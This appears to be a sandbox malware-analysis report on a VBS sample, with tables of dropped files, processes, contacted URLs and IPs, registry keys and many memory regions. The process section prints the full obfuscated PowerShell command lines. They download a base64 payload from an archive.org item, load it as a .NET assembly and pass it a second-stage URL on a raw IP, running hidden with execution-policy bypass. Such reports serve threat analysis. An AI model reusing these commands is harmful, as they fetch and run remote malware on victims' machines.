Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
f4576JaIo9.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kpxl44r.ssi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwprilqk.x4c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkv1mzly.m2c.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uirrxnjp.esi.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f4576JaIo9.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('Z'+'niu'+'rl'+' = 7uXhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/De'+'tahNoteV.'+'tx'+'t7'+'uX'+';'+'Z'+'nibas'+'e64'+'Con'+'t'+'ent
= (New-Ob'+'ject Sy'+'ste'+'m'+'.'+'N'+'e'+'t.WebC'+'l'+'ient'+').Do'+'w'+'n'+'loadSt'+'ring(Z'+'n'+'iurl)'+';Zni'+'binaryC'+'on'+'tent'+'
'+'= [S'+'yste'+'m.C'+'o'+'nver'+'t]::Fr'+'omBase64Stri'+'n'+'g(Znibase6'+'4Cont'+'e'+'n'+'t'+');'+'Znia'+'ssembl'+'y '+'=
[Refl'+'ect'+'ion'+'.Asse'+'m'+'bly]'+'::L'+'oad'+'('+'Z'+'nibi'+'naryCon'+'t'+'e'+'nt);Z'+'n'+'itype '+'='+' Z'+'niassemb'+'ly.GetType(7uX'+'R'+'u'+'nPE.H'+'o'+'me7'+'uX'+');'+'Znime'+'th'+'od'+'
'+'= Z'+'n'+'itype.'+'G'+'e'+'tMet'+'h'+'od'+'(7uX'+'V'+'AI7u'+'X);Z'+'nimetho'+'d.I'+'nvoke('+'Zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uXtxt.F'+'FCNR/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'uX
'+', 7uXdesativa'+'do7'+'uX '+', 7u'+'Xdes'+'a'+'ti'+'va'+'do7uX ,'+' 7uX'+'d'+'esativado7uX,7'+'uXR'+'egA'+'sm7'+'uX'+',7uX7'+'uX))')-REplaCe
([ChAr]55+[ChAr]117+[ChAr]88),[ChAr]39 -REplaCe'Zni',[ChAr]36) |. ( $eNV:cOmSPeC[4,24,25]-joiN'')"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt7uX;Znibase64Content
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
http://172.232.189.85(
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://172.232.189.85
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
||
|
http://172.232.189.85/2414/RNCFF.txt
|
172.232.189.85
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
||
|
172.232.189.85
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2669537A000
|
trusted library allocation
|
page read and write
|
|
|
|
2669D440000
|
trusted library section
|
page read and write
|
|
|
|
266866C6000
|
trusted library allocation
|
page read and write
|
||
|
1AEE861F000
|
heap
|
page read and write
|
||
|
1AEE6AAB000
|
heap
|
page read and write
|
||
|
26684750000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85A4000
|
heap
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6863000
|
heap
|
page read and write
|
||
|
1AEE8656000
|
heap
|
page read and write
|
||
|
1AEE68A8000
|
heap
|
page read and write
|
||
|
1AEE68B5000
|
heap
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFF0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85B5000
|
heap
|
page read and write
|
||
|
1AEE68AC000
|
heap
|
page read and write
|
||
|
7FFB4B0D0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE862C000
|
heap
|
page read and write
|
||
|
7CDCC7D000
|
stack
|
page read and write
|
||
|
15440160000
|
trusted library allocation
|
page read and write
|
||
|
2668647C000
|
trusted library allocation
|
page read and write
|
||
|
1AEE864B000
|
heap
|
page read and write
|
||
|
7FFB4B0A0000
|
trusted library allocation
|
page read and write
|
||
|
1542E37E000
|
heap
|
page read and write
|
||
|
26686458000
|
trusted library allocation
|
page read and write
|
||
|
2669D06C000
|
heap
|
page read and write
|
||
|
1AEE8617000
|
heap
|
page read and write
|
||
|
26685194000
|
trusted library allocation
|
page read and write
|
||
|
1AEE860B000
|
heap
|
page read and write
|
||
|
7FFB4AEA6000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85BA000
|
heap
|
page read and write
|
||
|
E593FE000
|
stack
|
page read and write
|
||
|
1AEE686F000
|
heap
|
page read and write
|
||
|
1AEE6AAA000
|
heap
|
page read and write
|
||
|
1AEE8612000
|
heap
|
page read and write
|
||
|
1542E2BF000
|
heap
|
page read and write
|
||
|
1543025E000
|
trusted library allocation
|
page read and write
|
||
|
7CDCCFE000
|
stack
|
page read and write
|
||
|
367F2FF000
|
stack
|
page read and write
|
||
|
7FFB4B181000
|
trusted library allocation
|
page read and write
|
||
|
7CDCFB9000
|
stack
|
page read and write
|
||
|
7FFB4AFF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2669CF23000
|
heap
|
page read and write
|
||
|
26684D00000
|
heap
|
page execute and read and write
|
||
|
1AEE8642000
|
heap
|
page read and write
|
||
|
1542E4A0000
|
heap
|
page read and write
|
||
|
26682D96000
|
heap
|
page read and write
|
||
|
7FFB4AFE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2669CE75000
|
heap
|
page read and write
|
||
|
1AEE85D9000
|
heap
|
page read and write
|
||
|
1AEE6AAC000
|
heap
|
page read and write
|
||
|
154483C8000
|
heap
|
page read and write
|
||
|
7FFB4B030000
|
trusted library allocation
|
page read and write
|
||
|
1AEE860F000
|
heap
|
page read and write
|
||
|
26682D99000
|
heap
|
page read and write
|
||
|
1AEE861C000
|
heap
|
page read and write
|
||
|
1AEE85AE000
|
heap
|
page read and write
|
||
|
26682DFA000
|
heap
|
page read and write
|
||
|
7CDDC8E000
|
stack
|
page read and write
|
||
|
26682D00000
|
heap
|
page read and write
|
||
|
1AEE681A000
|
heap
|
page read and write
|
||
|
1AEE68F0000
|
heap
|
page read and write
|
||
|
1AEE864A000
|
heap
|
page read and write
|
||
|
7CDCDFE000
|
stack
|
page read and write
|
||
|
154483BD000
|
heap
|
page read and write
|
||
|
26684770000
|
trusted library allocation
|
page read and write
|
||
|
1542E555000
|
heap
|
page read and write
|
||
|
2669CE79000
|
heap
|
page read and write
|
||
|
1AEE872C000
|
heap
|
page read and write
|
||
|
15448410000
|
heap
|
page execute and read and write
|
||
|
1AEE68C3000
|
heap
|
page read and write
|
||
|
2668536D000
|
trusted library allocation
|
page read and write
|
||
|
266857E8000
|
trusted library allocation
|
page read and write
|
||
|
26686A67000
|
trusted library allocation
|
page read and write
|
||
|
266830FB000
|
heap
|
page read and write
|
||
|
1542E500000
|
trusted library allocation
|
page read and write
|
||
|
26684856000
|
heap
|
page read and write
|
||
|
1AEE68C3000
|
heap
|
page read and write
|
||
|
1542E367000
|
heap
|
page read and write
|
||
|
7FFB4B100000
|
trusted library allocation
|
page read and write
|
||
|
266866E6000
|
trusted library allocation
|
page read and write
|
||
|
2669505A000
|
trusted library allocation
|
page read and write
|
||
|
1AEE686F000
|
heap
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85D1000
|
heap
|
page read and write
|
||
|
7FFB4AF92000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85A7000
|
heap
|
page read and write
|
||
|
2669CEEB000
|
heap
|
page read and write
|
||
|
1542E376000
|
heap
|
page read and write
|
||
|
7CDCB7E000
|
stack
|
page read and write
|
||
|
1542E550000
|
heap
|
page read and write
|
||
|
2669CE40000
|
heap
|
page execute and read and write
|
||
|
7FFB4AE5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AEE863B000
|
heap
|
page read and write
|
||
|
1AEE8731000
|
heap
|
page read and write
|
||
|
26685166000
|
trusted library allocation
|
page read and write
|
||
|
1AEE68BE000
|
heap
|
page read and write
|
||
|
1AEE87B0000
|
heap
|
page read and write
|
||
|
1AEE8641000
|
heap
|
page read and write
|
||
|
2668669A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ADF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AEE68C0000
|
heap
|
page read and write
|
||
|
2669CE70000
|
heap
|
page read and write
|
||
|
1AEE8624000
|
heap
|
page read and write
|
||
|
1AEE85E1000
|
heap
|
page read and write
|
||
|
7FFB4AE02000
|
trusted library allocation
|
page read and write
|
||
|
26686453000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
1AEE881B000
|
heap
|
page read and write
|
||
|
1542E530000
|
trusted library allocation
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
154301BB000
|
trusted library allocation
|
page read and write
|
||
|
1AEE8633000
|
heap
|
page read and write
|
||
|
7FFB4AEB6000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6818000
|
heap
|
page read and write
|
||
|
1AEE68A8000
|
heap
|
page read and write
|
||
|
154302AB000
|
trusted library allocation
|
page read and write
|
||
|
1AEE87B1000
|
heap
|
page read and write
|
||
|
1AEE8627000
|
heap
|
page read and write
|
||
|
7FFB4B060000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B0A0000
|
trusted library allocation
|
page read and write
|
||
|
1542E308000
|
heap
|
page read and write
|
||
|
1AEE6863000
|
heap
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
7FFB4B130000
|
trusted library allocation
|
page read and write
|
||
|
1542E4E0000
|
trusted library allocation
|
page read and write
|
||
|
E58FFE000
|
stack
|
page read and write
|
||
|
7FFB4B110000
|
trusted library allocation
|
page read and write
|
||
|
1AEE8647000
|
heap
|
page read and write
|
||
|
7CDCE79000
|
stack
|
page read and write
|
||
|
154482F8000
|
heap
|
page read and write
|
||
|
7CDCA73000
|
stack
|
page read and write
|
||
|
7FFB4B1A3000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6710000
|
heap
|
page read and write
|
||
|
7FFB4B070000
|
trusted library allocation
|
page read and write
|
||
|
1AEE67F0000
|
heap
|
page read and write
|
||
|
2669CF50000
|
heap
|
page read and write
|
||
|
1AEE6AA8000
|
heap
|
page read and write
|
||
|
1AEE8649000
|
heap
|
page read and write
|
||
|
15448580000
|
heap
|
page read and write
|
||
|
1542E520000
|
heap
|
page read and write
|
||
|
154483AE000
|
heap
|
page read and write
|
||
|
1AEE68B5000
|
heap
|
page read and write
|
||
|
7FFB4AFA1000
|
trusted library allocation
|
page read and write
|
||
|
26684DE2000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85D6000
|
heap
|
page read and write
|
||
|
1AEE8703000
|
heap
|
page read and write
|
||
|
26682DB2000
|
heap
|
page read and write
|
||
|
7FFB4B0D0000
|
trusted library allocation
|
page read and write
|
||
|
1543075C000
|
trusted library allocation
|
page read and write
|
||
|
266847E0000
|
trusted library allocation
|
page read and write
|
||
|
367F47C000
|
stack
|
page read and write
|
||
|
367F4FF000
|
stack
|
page read and write
|
||
|
2668516A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AE03000
|
trusted library allocation
|
page execute and read and write
|
||
|
26684F84000
|
trusted library allocation
|
page read and write
|
||
|
1543068B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B120000
|
trusted library allocation
|
page read and write
|
||
|
7CDDD0D000
|
stack
|
page read and write
|
||
|
7FFB4B150000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE20000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85C2000
|
heap
|
page read and write
|
||
|
7FFB4AE00000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFAA000
|
trusted library allocation
|
page read and write
|
||
|
26684730000
|
trusted library allocation
|
page read and write
|
||
|
E594FF000
|
stack
|
page read and write
|
||
|
367FABB000
|
stack
|
page read and write
|
||
|
E592FD000
|
stack
|
page read and write
|
||
|
1AEE6AA0000
|
heap
|
page read and write
|
||
|
E5891A000
|
stack
|
page read and write
|
||
|
7FFB4B140000
|
trusted library allocation
|
page read and write
|
||
|
367F67E000
|
stack
|
page read and write
|
||
|
7FFB4AFD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
154482F0000
|
heap
|
page read and write
|
||
|
1AEE86B0000
|
heap
|
page read and write
|
||
|
154482E0000
|
heap
|
page execute and read and write
|
||
|
1AEE8641000
|
heap
|
page read and write
|
||
|
E595FB000
|
stack
|
page read and write
|
||
|
2669D0A3000
|
heap
|
page read and write
|
||
|
15448570000
|
heap
|
page read and write
|
||
|
2669CF40000
|
heap
|
page read and write
|
||
|
367F37F000
|
stack
|
page read and write
|
||
|
2669D133000
|
heap
|
page read and write
|
||
|
15430275000
|
trusted library allocation
|
page read and write
|
||
|
26685159000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6819000
|
heap
|
page read and write
|
||
|
7FFB4B100000
|
trusted library allocation
|
page read and write
|
||
|
1AEE68E3000
|
heap
|
page read and write
|
||
|
7CDCAFE000
|
stack
|
page read and write
|
||
|
1AEE8704000
|
heap
|
page read and write
|
||
|
1542E280000
|
heap
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
266847A0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85CE000
|
heap
|
page read and write
|
||
|
26682DD2000
|
heap
|
page read and write
|
||
|
7FFB4ADF4000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF90000
|
trusted library allocation
|
page read and write
|
||
|
2669CE50000
|
heap
|
page read and write
|
||
|
7FFB4AE00000
|
trusted library allocation
|
page read and write
|
||
|
1AEE68AC000
|
heap
|
page read and write
|
||
|
266861E8000
|
trusted library allocation
|
page read and write
|
||
|
26694DD0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE8643000
|
heap
|
page read and write
|
||
|
1AEE8735000
|
heap
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
26682DC0000
|
heap
|
page read and write
|
||
|
7CDD13E000
|
stack
|
page read and write
|
||
|
1543075E000
|
trusted library allocation
|
page read and write
|
||
|
2669D058000
|
heap
|
page read and write
|
||
|
15430151000
|
trusted library allocation
|
page read and write
|
||
|
1542E2DF000
|
heap
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE68B5000
|
heap
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
2669CF70000
|
heap
|
page read and write
|
||
|
1AEE6AAE000
|
heap
|
page read and write
|
||
|
7FFB4B030000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFB1000
|
trusted library allocation
|
page read and write
|
||
|
2669D0DC000
|
heap
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6AAA000
|
heap
|
page read and write
|
||
|
1AEE85FE000
|
heap
|
page read and write
|
||
|
2669D050000
|
heap
|
page read and write
|
||
|
26682DBC000
|
heap
|
page read and write
|
||
|
367F93E000
|
stack
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
2668518E000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6AAE000
|
heap
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
2669CE6D000
|
heap
|
page read and write
|
||
|
1AEE8617000
|
heap
|
page read and write
|
||
|
7FFB4AEE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AEE8720000
|
heap
|
page read and write
|
||
|
7FFB4AE10000
|
trusted library allocation
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
26686A6B000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6AAD000
|
heap
|
page read and write
|
||
|
15430768000
|
trusted library allocation
|
page read and write
|
||
|
1AEE872B000
|
heap
|
page read and write
|
||
|
1542E2C1000
|
heap
|
page read and write
|
||
|
2669D430000
|
heap
|
page read and write
|
||
|
2669D092000
|
heap
|
page read and write
|
||
|
26686810000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85A0000
|
heap
|
page read and write
|
||
|
1AEE86B1000
|
heap
|
page read and write
|
||
|
1AEE8646000
|
heap
|
page read and write
|
||
|
26684760000
|
heap
|
page readonly
|
||
|
15448341000
|
heap
|
page read and write
|
||
|
1AEE85DE000
|
heap
|
page read and write
|
||
|
26686721000
|
trusted library allocation
|
page read and write
|
||
|
266854D1000
|
trusted library allocation
|
page read and write
|
||
|
367F5FE000
|
stack
|
page read and write
|
||
|
1542E30D000
|
heap
|
page read and write
|
||
|
26694D61000
|
trusted library allocation
|
page read and write
|
||
|
15448460000
|
heap
|
page read and write
|
||
|
7FFB4B080000
|
trusted library allocation
|
page read and write
|
||
|
266830D0000
|
heap
|
page read and write
|
||
|
1543016B000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6AAA000
|
heap
|
page read and write
|
||
|
2668514E000
|
trusted library allocation
|
page read and write
|
||
|
1AEE6AA8000
|
heap
|
page read and write
|
||
|
266830F0000
|
heap
|
page read and write
|
||
|
15430258000
|
trusted library allocation
|
page read and write
|
||
|
1AEE68B5000
|
heap
|
page read and write
|
||
|
1543026C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CDD03B000
|
stack
|
page read and write
|
||
|
7CDD2BC000
|
stack
|
page read and write
|
||
|
7FFB4B0E0000
|
trusted library allocation
|
page read and write
|
||
|
154401C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B170000
|
trusted library allocation
|
page read and write
|
||
|
26685381000
|
trusted library allocation
|
page read and write
|
||
|
7CDD23F000
|
stack
|
page read and write
|
||
|
E58DFE000
|
stack
|
page read and write
|
||
|
1AEE681B000
|
heap
|
page read and write
|
||
|
1AEE85D6000
|
heap
|
page read and write
|
||
|
1AEE85BD000
|
heap
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
367F57E000
|
stack
|
page read and write
|
||
|
7FFB4B0F0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85A2000
|
heap
|
page read and write
|
||
|
1AEE8645000
|
heap
|
page read and write
|
||
|
7FFB4AE0C000
|
trusted library allocation
|
page read and write
|
||
|
1543064E000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85A1000
|
heap
|
page read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85EF000
|
heap
|
page read and write
|
||
|
7FFB4AEC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26684850000
|
heap
|
page read and write
|
||
|
7CDCD7E000
|
stack
|
page read and write
|
||
|
1AEE8721000
|
heap
|
page read and write
|
||
|
1542E2C5000
|
heap
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page read and write
|
||
|
367F273000
|
stack
|
page read and write
|
||
|
15430070000
|
heap
|
page execute and read and write
|
||
|
1AEE8651000
|
heap
|
page read and write
|
||
|
154301E8000
|
trusted library allocation
|
page read and write
|
||
|
367FA3E000
|
stack
|
page read and write
|
||
|
26695D7A000
|
trusted library allocation
|
page read and write
|
||
|
2669CF49000
|
heap
|
page read and write
|
||
|
1AEE6AAE000
|
heap
|
page read and write
|
||
|
7FFB4AFBA000
|
trusted library allocation
|
page read and write
|
||
|
367F73E000
|
stack
|
page read and write
|
||
|
367F3FF000
|
stack
|
page read and write
|
||
|
26684D50000
|
heap
|
page read and write
|
||
|
154483A2000
|
heap
|
page read and write
|
||
|
1AEE6AA5000
|
heap
|
page read and write
|
||
|
7FFB4ADF2000
|
trusted library allocation
|
page read and write
|
||
|
2669CE47000
|
heap
|
page execute and read and write
|
||
|
1AEE8638000
|
heap
|
page read and write
|
||
|
1AEE864C000
|
heap
|
page read and write
|
||
|
7FFB4AED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2669D0AC000
|
heap
|
page read and write
|
||
|
26682DB6000
|
heap
|
page read and write
|
||
|
1AEE85EB000
|
heap
|
page read and write
|
||
|
266864A0000
|
trusted library allocation
|
page read and write
|
||
|
266830F4000
|
heap
|
page read and write
|
||
|
1542E293000
|
heap
|
page read and write
|
||
|
1AEE68E3000
|
heap
|
page read and write
|
||
|
367F6BF000
|
stack
|
page read and write
|
||
|
1AEE6AAC000
|
heap
|
page read and write
|
||
|
7FFB4AE04000
|
trusted library allocation
|
page read and write
|
||
|
2669CDD0000
|
heap
|
page execute and read and write
|
||
|
7FFB4B060000
|
trusted library allocation
|
page read and write
|
||
|
15430272000
|
trusted library allocation
|
page read and write
|
||
|
2669CEAA000
|
heap
|
page read and write
|
||
|
7FFB4B110000
|
trusted library allocation
|
page read and write
|
||
|
1542E2CD000
|
heap
|
page read and write
|
||
|
7FFB4AEBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B194000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0F0000
|
trusted library allocation
|
page read and write
|
||
|
26684854000
|
heap
|
page read and write
|
||
|
1AEE6910000
|
heap
|
page read and write
|
||
|
7CDCF37000
|
stack
|
page read and write
|
||
|
1542E2C9000
|
heap
|
page read and write
|
||
|
26682D30000
|
heap
|
page read and write
|
||
|
1AEE8614000
|
heap
|
page read and write
|
||
|
7FFB4AE0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B070000
|
trusted library allocation
|
page read and write
|
||
|
2669504C000
|
trusted library allocation
|
page read and write
|
||
|
1AEE68B4000
|
heap
|
page read and write
|
||
|
1AEE6A80000
|
heap
|
page read and write
|
||
|
15430620000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85C9000
|
heap
|
page read and write
|
||
|
26682E5A000
|
heap
|
page read and write
|
||
|
26682D10000
|
heap
|
page read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page read and write
|
||
|
1AEE682E000
|
heap
|
page read and write
|
||
|
2668646A000
|
trusted library allocation
|
page read and write
|
||
|
